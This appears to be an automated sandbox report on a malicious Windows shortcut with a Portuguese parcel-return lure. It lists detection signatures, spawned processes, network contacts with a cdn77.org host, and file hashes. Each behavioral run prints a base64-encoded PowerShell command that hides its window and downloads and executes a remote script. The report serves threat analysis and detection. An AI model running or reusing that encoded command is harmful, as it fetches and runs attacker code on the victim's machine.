Malware Analysis Report

2025-01-18 14:04

Sample ID 240613-czx4ravejm
Target a3894901d5099b875b8b0f7226b1904d_JaffaCakes118
SHA256 f17e4e745a25bca04647fa4fc056c44835190a36d30b7cf467351ea33199bb6b
Tags
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

f17e4e745a25bca04647fa4fc056c44835190a36d30b7cf467351ea33199bb6b

Threat Level: Known bad

The file a3894901d5099b875b8b0f7226b1904d_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary


Blocklisted process makes network request

Checks computer location settings

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-13 02:31

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-13 02:31

Reported

2024-06-13 02:34

Platform

win7-20240611-en

Max time kernel

121s

Max time network

126s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\Mercadoria_Devolvida-Correios-H0C42E2H.lnk

Signatures

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\Mercadoria_Devolvida-Correios-H0C42E2H.lnk

C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" -en YQBEAGQALQB0AFkAUABFACAALQBOAGEATQBFACAAQQAgAC0ATQBFAE0AYgBlAFIAZABlAGYAaQBOAEkAVABpAG8AbgAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABTAGgAbwB3AFcAaQBuAGQAbwB3ACgAaQBuAHQAIABoACwAIABpAG4AdAAgAHMAKQA7ACcAIAAtAE4AYQBtAGUAUwBQAEEAQwBFACAAQgA7AFsAQgAuAGEAXQA6ADoAUwBIAE8AdwBXAGkAbgBkAE8AVwAoACgAWwBzAFkAUwB0AGUAbQAuAGQAaQBhAEcATgBvAHMAdABpAEMAcwAuAFAAcgBvAEMAZQBzAFMAXQA6ADoARwBFAFQAYwB1AFIAcgBlAG4AVABwAFIAbwBDAGUAcwBzACgAKQAgAHwAIABQAFMAKQAuAG0AYQBJAG4AVwBJAE4ARABvAHcASABBAG4AZABsAGUALAAwACkAOwBJAEUAeAAoAE4ARQB3AC0AbwBCAGoAZQBDAHQAIABOAEUAVAAuAHcARQBCAGMAbABJAEUAbgBUACkALgBEAG8AVwBOAGwATwBhAEQAcwB0AFIASQBOAEcAKAAnAGgAdAB0AHAAcwA6AC8ALwAxADMANgAxADIAMgA3ADYAMgA0AC4AcgBzAGMALgBjAGQAbgA3ADcALgBvAHIAZwAvAHYAMgAvAGcAbAAuAHAAaABwAD8AYQBIAFIAMABjAEgATQA2AEwAeQA4AHgATQB6AFkAeABNAGoASQAzAE4AagBJADAATABuAEoAegBZAHkANQBqAFoARwA0ADMATgB5ADUAdgBjAG0AYwB2AGQAagBKADgAZAAzAEkAegBNAFEAJQAzAEQAJQAzAEQAJQAnACkA

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vaotr-rh.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2251.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC2250.tmp"

Network

Country Destination Domain Proto
US 8.8.8.8:53 1361227624.rsc.cdn77.org udp
GB 89.187.167.7:443 1361227624.rsc.cdn77.org tcp
GB 89.187.167.7:443 1361227624.rsc.cdn77.org tcp
GB 195.181.164.17:443 1361227624.rsc.cdn77.org tcp

Files

memory/2748-38-0x000007FEF5BBE000-0x000007FEF5BBF000-memory.dmp

memory/2748-39-0x000000001B520000-0x000000001B802000-memory.dmp

memory/2748-40-0x00000000022C0000-0x00000000022C8000-memory.dmp

memory/2748-41-0x000007FEF5900000-0x000007FEF629D000-memory.dmp

memory/2748-42-0x000007FEF5900000-0x000007FEF629D000-memory.dmp

memory/2748-43-0x000007FEF5900000-0x000007FEF629D000-memory.dmp

memory/2748-47-0x000007FEF5900000-0x000007FEF629D000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\vaotr-rh.cmdline

MD5 c9c37412c4e78ea0e0ca3395102689a0
SHA1 21688e857f03f11852a99da078f9125ba42f2110
SHA256 08ea5275ed60fb83fd7485f72ce364b874242c37a17683225fc64849748cb506
SHA512 a1f9ad50d2b27c8700cd28af0c05cb7a67ef9a1b438289466c4c867fbf3a3a6bd8348eb59148d3c187fa8f6873fe4bf53baa5714d7d6614ada96a8d399beeed0

\??\c:\Users\Admin\AppData\Local\Temp\vaotr-rh.0.cs

MD5 7b0e7177dfbb9edd1c1ef08b4fdfae2f
SHA1 cb11a0252cdad66ec247312ccb7feb46456e52b6
SHA256 6caf22ef995616dc37bec21b2af3aa4597cdad88e00a13de0122db3af4e9a4aa
SHA512 7322be891145e550405917757420aeb513e5689970d34647177b1a79a12c7776d4e49c129b093be9927b46bc7582c0379e0cb520af58d4410ed4c5ef98b4dbfd

\??\c:\Users\Admin\AppData\Local\Temp\CSC2250.tmp

MD5 9053cace7763f13f477946bdf6264ec4
SHA1 c4607d0d3064e64f6cfe155cce87b1708dc5946c
SHA256 d20ac6c682187207ea711de5d029711a87c150d2fa145764630d6dc09a37468f
SHA512 97ddf59ec90a6ca55c8862e57be9f42afb815cf0763c2126cd92355c836506b50294bd074e60510707f65d230273fab3776d210af1c42db3d1afdde94780c59d

C:\Users\Admin\AppData\Local\Temp\RES2251.tmp

MD5 4d3d7cb4bc4ed06b00551335e61f724f
SHA1 14416124515d673af368d23a5fe63e95bb857778
SHA256 192ce989995a2c53d6fbc3a99c5203528b68ea9178e47d0ab65a94e9b4f8c143
SHA512 08ed498642cbf8742a2274175a25df17496d4c84b118febcff68eb21a16fd182d75322d42a0e2e88d6e5b696b8b5f7823644df942c47521c5bf244e896846bf6

C:\Users\Admin\AppData\Local\Temp\vaotr-rh.dll

MD5 519f0f8988678e2d402c51e0599a04d7
SHA1 4a75e96d4a821ca721c85d574a187bfd50ca62a0
SHA256 1d9a8f5011c76464941831f04933d57367c8e109de7b876667b3118c52ef1b01
SHA512 a32f8225001b78ddf9e8a669df920213b7a36b96a7cfa52caed7b15588f8f4a1ce49a051ddaf481a4a32dd4e0a7e5bba5f6cabe34cc79f7e85adcd9e860541a2

C:\Users\Admin\AppData\Local\Temp\vaotr-rh.pdb

MD5 dfd498ea7e752d5186c7e0e20e23324c
SHA1 a5014734774e36a917097d320c826328b47a3f6a
SHA256 1a595fe7a0c2ec07c5689ed4196c7448121a5a4824cd2d0153c98bfadcb7d748
SHA512 7c6a7638a5c49a0cd1919ff53bcd3d478f7eb1b268381cdd1e13d1a4ded2cb3d342b924702fcf9d55cef3ea289f1eda77d62a14c295d7f89002d16a866959e65

memory/2748-58-0x0000000002C60000-0x0000000002C68000-memory.dmp

memory/2748-61-0x000007FEF5900000-0x000007FEF629D000-memory.dmp

memory/2748-62-0x000007FEF5BBE000-0x000007FEF5BBF000-memory.dmp

memory/2748-63-0x000007FEF5900000-0x000007FEF629D000-memory.dmp

memory/2748-65-0x000007FEF5900000-0x000007FEF629D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-13 02:31

Reported

2024-06-13 02:34

Platform

win10v2004-20240508-en

Max time kernel

51s

Max time network

51s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\Mercadoria_Devolvida-Correios-H0C42E2H.lnk

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\Mercadoria_Devolvida-Correios-H0C42E2H.lnk

C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" -en YQBEAGQALQB0AFkAUABFACAALQBOAGEATQBFACAAQQAgAC0ATQBFAE0AYgBlAFIAZABlAGYAaQBOAEkAVABpAG8AbgAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABTAGgAbwB3AFcAaQBuAGQAbwB3ACgAaQBuAHQAIABoACwAIABpAG4AdAAgAHMAKQA7ACcAIAAtAE4AYQBtAGUAUwBQAEEAQwBFACAAQgA7AFsAQgAuAGEAXQA6ADoAUwBIAE8AdwBXAGkAbgBkAE8AVwAoACgAWwBzAFkAUwB0AGUAbQAuAGQAaQBhAEcATgBvAHMAdABpAEMAcwAuAFAAcgBvAEMAZQBzAFMAXQA6ADoARwBFAFQAYwB1AFIAcgBlAG4AVABwAFIAbwBDAGUAcwBzACgAKQAgAHwAIABQAFMAKQAuAG0AYQBJAG4AVwBJAE4ARABvAHcASABBAG4AZABsAGUALAAwACkAOwBJAEUAeAAoAE4ARQB3AC0AbwBCAGoAZQBDAHQAIABOAEUAVAAuAHcARQBCAGMAbABJAEUAbgBUACkALgBEAG8AVwBOAGwATwBhAEQAcwB0AFIASQBOAEcAKAAnAGgAdAB0AHAAcwA6AC8ALwAxADMANgAxADIAMgA3ADYAMgA0AC4AcgBzAGMALgBjAGQAbgA3ADcALgBvAHIAZwAvAHYAMgAvAGcAbAAuAHAAaABwAD8AYQBIAFIAMABjAEgATQA2AEwAeQA4AHgATQB6AFkAeABNAGoASQAzAE4AagBJADAATABuAEoAegBZAHkANQBqAFoARwA0ADMATgB5ADUAdgBjAG0AYwB2AGQAagBKADgAZAAzAEkAegBNAFEAJQAzAEQAJQAzAEQAJQAnACkA

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4mmjhbno\4mmjhbno.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES50CF.tmp" "c:\Users\Admin\AppData\Local\Temp\4mmjhbno\CSCD60A370FA8448CE91C281C09BEDF7DF.TMP"

Network

Country Destination Domain Proto
US 8.8.8.8:53 1361227624.rsc.cdn77.org udp

Files

memory/4268-2-0x00007FFD32733000-0x00007FFD32735000-memory.dmp

memory/4268-3-0x000001E9CFC40000-0x000001E9CFC62000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hp2wrhz3.ztt.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4268-13-0x00007FFD32730000-0x00007FFD331F1000-memory.dmp

memory/4268-14-0x00007FFD32730000-0x00007FFD331F1000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\4mmjhbno\4mmjhbno.0.cs

MD5 7b0e7177dfbb9edd1c1ef08b4fdfae2f
SHA1 cb11a0252cdad66ec247312ccb7feb46456e52b6
SHA256 6caf22ef995616dc37bec21b2af3aa4597cdad88e00a13de0122db3af4e9a4aa
SHA512 7322be891145e550405917757420aeb513e5689970d34647177b1a79a12c7776d4e49c129b093be9927b46bc7582c0379e0cb520af58d4410ed4c5ef98b4dbfd

\??\c:\Users\Admin\AppData\Local\Temp\4mmjhbno\4mmjhbno.cmdline

MD5 c7c971702ae33f87a3c605e7f9a8e3c2
SHA1 514d554d797228435d6a0751801826f058c0ed29
SHA256 aa232abe9b41ebdeff838a369cc012a1a1c46b870a321e7ac2a0f5f29a1d6a4e
SHA512 c14de704b6ea142b29899cfd8471a0d7d31419ac672228a2e96e39f093a3ba3f5f73e01e9a1e5c10ba13b6a275e36c6ab8ce950d20859fd106d229685f656b39

\??\c:\Users\Admin\AppData\Local\Temp\4mmjhbno\CSCD60A370FA8448CE91C281C09BEDF7DF.TMP

MD5 32f206c989422b3df2f6225c9ac5f9be
SHA1 748aef167a738192b6ef21c964c30d9b169d2e4d
SHA256 5c3bb3f60b056476c2be7e746625fbddc7edd8cf6630dc873895511ad3964e0c
SHA512 edb9f7af5c9ed9e3ddfc6e32c407fa01fd09c54e5eee8f102c4dcff53c5631650c9d131f9e96ccb6447ce9f8d4979f7a6fb0ff9fb1e32b66130c58a85b2e2c02

C:\Users\Admin\AppData\Local\Temp\RES50CF.tmp

MD5 d86f725d547cb238fc0e460a6ec552f5
SHA1 2928afba43f00889d5e35240c7efb3d94c6e1918
SHA256 96323c77c7ab3ce4ded15543adf859c75dc903c3acddc8cdd9c7b5d11e847f81
SHA512 a3c5251303214d05e6c20a74ce13c1ea4eb357e64484b3cdd4214a496b6b20649a04bfcf8421da8e00622cff6cf4fb38bf20550ce7293c0cfae0c8bcc7ed6017

memory/4268-27-0x000001E9CFC90000-0x000001E9CFC98000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\4mmjhbno\4mmjhbno.dll

MD5 0c39411b5d7354d62bc468e1ecc003cf
SHA1 f303e17b70669aafd6a78621c683cbbc0e9d68b3
SHA256 d79a3d27b16155dc85d3ee3119a11db06077c704acfae526f9bfe1cb5e1fb6bb
SHA512 00c71134e54b4b256b7de7de91b40a6af2261244ede10b808e95011a96f37f9982c0fe51d79b134574d01b088236456008caa6418037d41d45bf2e9ed3ed8641

memory/4268-31-0x00007FFD32730000-0x00007FFD331F1000-memory.dmp